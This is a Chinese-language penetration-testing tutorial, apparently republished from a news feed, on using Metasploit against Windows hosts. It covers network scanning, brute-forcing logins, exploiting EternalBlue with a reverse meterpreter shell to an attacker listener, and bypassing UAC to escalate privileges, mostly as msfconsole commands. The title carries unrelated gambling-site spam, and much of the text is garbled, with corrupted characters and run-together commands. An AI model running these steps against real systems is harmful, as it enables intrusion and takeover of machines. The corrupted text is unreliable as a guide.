安基網 首頁 安全 滲透測試 查看內容

雪缘园资料库德乙积分榜:黑客滲透過程再現,揭秘神秘的黑客一族

英超雪缘园 www.trual.com.cn 2020-1-1 18:09| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 在滲透過程中,MSF是不可或缺的。更何況它是一個免費的、可下載的框架,通過它可以很容易地獲取、開發并對計算機軟件實施攻擊。前不久MSF從4.7升級到MSF5.0,其中改進了數據庫的處理邏輯,優化了msfconsole終端操作,并將PostgreSQL作為一個RESTful服務單獨運行。此外還加入一個Web服務框架,新的免殺模 ...

在滲透過程中,MSF是不可或缺的。更何況它是一個免費的、可下載的框架,通過它可以很容易地獲取、開發并對計算機軟件實施攻擊。

前不久MSF從4.7升級到MSF5.0,其中改進了數據庫的處理邏輯,優化了msfconsole終端操作,并將PostgreSQL作為一個RESTful服務單獨運行。此外還加入一個Web服務框架,新的免殺???,優化了控制功能等。

下面小白總結了一下在滲透測試中,使用頻率較多的MSF命令,分為以下幾塊來講。

信息收集

發現目標網段的存活主機:

我們可以利用auxiliary這個??槔椿袢∧勘暉說男畔?,包括端口開放情況、主機存活情況。

auxiliary/scanner/discovery/arp_sweep

auxiliary/scancer/smb/smb_version 存活的445主機

auxiliary/scanner/portscan/syn 端口掃描

auxiliary/scanner/telnet/telnet_version telent服務掃描

auxiliary/scanner/rdp/rdp_scanner 遠程桌面服務掃描

auxiliary/scanner/ssh/ssh_version ssh主機掃描

。。。。。。

圖片一掃描??樾畔?/strong>

一般情況下我們在滲透測試的時候,如果在不知道資產的情況下,我們會把整個網端進行掃描存活主機,然后再對存活的信息收集信息,這樣的話就可以縮短我們的滲透測試時間,而不盲目的去測試,有時候盲目信息收集會導致后期滲透的道路都是彎的,達不到預期的效果。

不管是端口掃描還是探測存活主機,都是要設置目標IP地址set rhosts ip地址,如果掃描整個網段的話,最后設置一下線程:set thread 線程數(根據情況設置)。

執行run命令開始掃描網段的存活主機,發現有7臺服務器存活,這樣的話我們就可以對這些存活主機進行下一步的信息收集,比如22、445、3389等敏感端口開放情況探測,在這里需要說明一下,以小白的滲透測試經驗,一般我先不掃描整個網端,因為這樣對目標主機有損耗,可以直接掃描有溢出漏洞的高危端口,如果有的話,那么就可以通過溢出進行提權,這樣的方法也是一種捷徑。相反的情況下,如果全端口掃描的話個人建議用nmap工具。

下面我們探測一下網段中開啟445端口的主機,通過掃描發現網段中有3臺主機開啟了445端口,這樣的話我們就可以在后期的漏洞探測中測試是否存在永恒之藍。

Use auxiliary/scanner/smb/smb_version

Set rhosts 192.168.201.1/24 //設置目標主機地址

Set threads 30 //設置掃描線程

Run //執行掃描命令

前期其它的端口掃描的命令都是差不多的,下面我們介紹一下爆破的???,在kali中有自己內置的密碼本,當然你也可以用自己的字典。你看多方便,想用就用,不用就不用。

內置密碼表的地址:/usr/share/wordlists/metasploit/

一般爆破的話我們可以對ssh、mysql、sql、Oracle、vnc、telnet等常用的端口

1)auxiliary/scanner/mysql/mysql_login

2)auxiliary/scanner/mssql/mssql_login

3)auxiliary/scanner/ssh/ssh_login

4)。。。。。。

漏探

接下來我們通過前期的信息收集,可以得到目標主機中有三臺主機開啟了445端口,我們可以進一步探測是不是存在永恒之藍。我們可以用以下命令來探測一下:

在之前做培訓的時候,本地搭建測試環境發現2008 R2的服務器的時候就直接藍屏,具體原因不清。所以大家在滲透測試的過程中一定要合理的評估漏洞的可用性。通過掃描發現有一臺目標主機存在永恒之藍。其實除了永恒之藍,也有許多其它的溢出,在這里就不一一詳解了,原理都一樣。

use auxiliary/scanner/smb/smb_ms17_010 //使用永恒之藍探測???/p>

how options 查看需要添加的信息

set rhosts 192.168.205.1/24 //設置掃描目標主機IP地址

set threads 30 //設置掃描線程

Run //開啟掃描

漏洞利用

通過漏洞探索階段我們發現192.168.205.150這臺目標主機存在永恒之藍,那我們可以使用MSF中的攻擊??榻新┒?,看看能不能獲取到目標主機的權限,這樣的話,我們就可以通過溢出來搞內網的橫向掃描。執行以下命令:

use exploit/windows/smb/ms17_010_eternalblue //使用永恒之藍攻擊???/p>

set payload windows/meterpreter/reverse_tcp //設置一個Payload,使攻擊機接受來自目標主機的session

set rhosts 192.168.205.150 //設置目標主機地址

set lhost 192.168.205.148 //設置接受payload的地址,我們這里設置MSF的地址

set LPORT 5555 // 設置接受的端口,這個自己自定義,只要不與其它端口沖突就可以

Exploit //執行

權限提升

當我們得到一個目標主機返回的shell后,我們第一步要看的是當前用戶是不是管理員權限,如果不是管理員權限,這個時候需要我們去提權。我們可以利用kaili中的本地提權的方式,下面介紹一下本地提權繞過UAC的方式提升當前用戶權限,以下是詳細的命令以及步驟:

我們首先介紹一下這個UAC到底是什么東東,是怎么運行的?

1.什么是UAC?

Microsoft的Windows Vista和Windows Server 2008操作系統引入了一種良好的用戶帳戶控制架構,以防止系統范圍內的意外更改,這種更改是可以預見的,并且只需要很少的操作量。它是Windows的一個安全功能,它支持防止對操作系統進行未經授權的修改,UAC確保僅在管理員授權的情況下進行某些更改。如果管理員不允許更改,則不會執行這些更改,并且Windows系統保持不變。

2.UAC如何運行?

UAC通過阻止程序執行任何涉及有關系統更改/特定任務的任務來運行。除非嘗試執行這些操作的進程以管理員權限運行,否則這些操作將無法運行。如果您以管理員身份運行程序,則它將具有更多權限,因為它將被"提升權限",而不是以管理員身份運行的程序。

因為有的用戶是沒有管理員權限,沒有管理員權限是運行不了哪些只能通過管理員權限才能操作的命令。比如修改注冊表信息、創建用戶、讀取管理員賬戶密碼、設置計劃任務添加到開機啟動項等操作。

最直接的提權命令:getsystem

繞過UAC防護機制的前提是我們首先通過explloit獲得目標主機的meterprter?;竦胢eterpreter會話1后,輸入以下命令以檢查是否是system權限。在這里我就不直接演示了,直接上命令,自己多練習練習即可,所話說熟能生巧。我們需要把獲取到的session保存到后臺,執行background

方法一:

use exploit/windows/local/bypassuac //將通過進程注入使用可信任發布者證書繞過Windows UAC。它將生成關閉UAC標志的第二個shell。

set session 1 //使用sessino 1

Exploit //執行權限提升的攻擊模式


執行完畢成功后,再次查詢當前用戶的權限就會提升到管理員權限。我這里已經是管理員權限了,所以會出現這樣的提示。


方法二:Windows權限提升繞過UAC?;ぃ詿孀⑷耄?/strong>

此??榻ü套⑷朧褂每尚湃蔚姆⒉頰咧な槿乒齏indows UAC。它將生成關閉UAC標志的第二個shell。在普通技術中,該??槭褂梅瓷涫紻LL注入技術并只除去了DLL payload 二進制文件,而不是三個單獨的二進制文件。但是,它需要選擇正確的體系架構(對于SYSWOW64系統也使用x64)。執行完畢以下命令,當前用戶權限就會變為管理員權限。

use exploit/windows/local/bypassuac_fodhelperset session 1Exploit

方法三:通過COM處理程序劫持

首先介紹一下這個COM處理程序劫持,此??榻ü趆kcu配置單元中創建COM處理程序注冊表項來繞過Windows UAC。當加載某些較高完整性級別進程時,會引用這些注冊表項,從而導致進程加載用戶控制的DLL。這些DLL包含導致會話權限提升的payload。此??樾薷淖⒉岜硐?,但在調用payload后將清除該項。這個??樾枰猵ayload的體系架構和操作系統匹配,但是當前的低權限meterpreter會話體系架構中可能不同。如果指定exe::custom,則應在單獨的進程中啟動payloa后調用ExitProcess()。此??橥ü勘晟系腸md.exe調用目標二進制文件。因此,如果cmd.exe訪問受到限制,此??榻薹ㄕT誦?。

命令執行:

use exploit/windows/local/bypassuac_comhijackset session 1Exploit

方法四:通過Eventvwr注冊表項

首先介紹一下這個???,此??榻ü詰鼻壩沒渲玫ピ陸儷腫⒉岜碇械奶厥餳⒉迦虢諂舳疻indows事件查看器時調用的自定義命令來繞過Windows UAC。它將生成關閉UAC標志的第二個shell。此??樾薷淖⒉岜硐?,但在調用payload后將清除該項。該??椴恍枰猵ayload的體系架構和操作系統匹配。如果指定EXE ::Custom,則應在單獨的進程中啟動payload后調用ExitProcess()。

use exploit/windows/local/bypassuac_eventvwrset session 1Exploit


以上的本地提權的??櫬蠹銥梢員鏡厝ゲ饈砸幌?,除了這些某塊還有其它的通過直接通過incognito中的add_localgroup_user提升、ms13-081、ms15-051、ms16-032、MS16-016、MS14-068、ms18_8120_win32k_privesc域權限提升等其它的權限提升方法。小白在內網滲透測試的過程中發現一些客戶的服務器大多數為2003、2008服務器,很少2012、2016服務器。



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6776508145733730829/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

相關閱讀

最新評論

 最新
返回頂部
{ganrao}